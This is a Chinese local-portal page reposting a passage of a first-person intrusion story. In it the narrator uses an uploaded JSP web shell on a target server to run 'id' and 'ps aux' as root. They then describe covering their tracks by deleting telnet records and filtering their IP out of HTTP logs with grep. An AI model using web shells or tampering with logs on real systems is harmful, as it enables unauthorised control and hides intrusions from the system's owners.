济宁天气预报
济宁市人力资源和社会保障局
济宁人事考试单位代码
济宁市安全教育平台
济宁违章查询
济宁住房公积金查询
济宁科技网 济宁培训班 济宁银行网上银行 济宁教育网 历史故事 家庭教育 济宁市地图 济宁房产 济宁教育网 济宁人事考试信息网 济宁新闻网
币圈最新消息 济宁信息港
浏览器之家 济宁汽车 睡前小故事
下载吧 股票书籍 花花草草
百应百科 照片恢复 学习通
红警之家 睡前小故事 马伊琍
手机照片恢复 手机数据恢复

黑客攻击技术 WEB网站入侵的全过程讲述(2)

时间:2010-09-09 18:31来源:未知 www.yunhepan.com

接下去的事情,差点没让我吐血:

我敲了一个:http://target:8080/upload/cmd.jsp?cmd=id

显示:

  1. uid=0(root)gid=0(xxx)groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)

我的这个WEB SHELL本来就是ROOT,真是服了那个管理员,也服了自己。竟然折腾了这么半天,哎!

http://target:8080/upload/cmd.jsp?cmd=ps+aux

果然是root身份运行的(不列出来了)

剩下来的事情:

1、删除我的telnet记录。

2、删除http的日志。

至于清除日志嘛,我使用的办法是:cat xxx  grep -V "IP" >>temp然后在把temp覆盖那些被我修改过的日志文件。

我没有更换他的页面,因为我本身也就不是什么黑客啦,更不是红客,只是个网络安全爱好者而已。所以,发封邮件告诉system admin吧!

上述的相关内容就是对黑客攻击技术 WEB网站入侵的过程的描述,希望会给你带来一些帮助在此方面。

相关阅读
  • 调查显示大企业中只有33%未被黑客入侵
  • 简述主要的黑客入侵途径及应对方法
  • 通过交换机防范蠕虫病毒入侵
  • 黑客攻击和入侵的八大常用手段有哪些?
  • 黑客捕捉技术之网络入侵追踪方法
  • SQL注入网站入侵实例演示
  • 实例讲述网络社会工程学
  • 黑客入侵也无间 盗走网吧20万

  • 上一篇:手动防御传奇攻击问题
    下一篇:闪存驱动器攻击介质仍受黑客青睐

    济宁运河畔网版权与免责声明:

    ①凡本网来源于注明来“源于:运河畔或www.yunhepan.com”版权均属运河畔网所有,其他媒体可以转载,且需注明“来源运河畔网”
    ② 凡本网注明“来源:XXX(非济宁运河畔,济宁信息港)”的作品,均转载自其它媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
    ③ 如因作品内容、版权和其它问题需要同本网联系的,请在30日内进行。

    • 全网热点
    • 健康
    • 教育
    • 新闻
    • 美食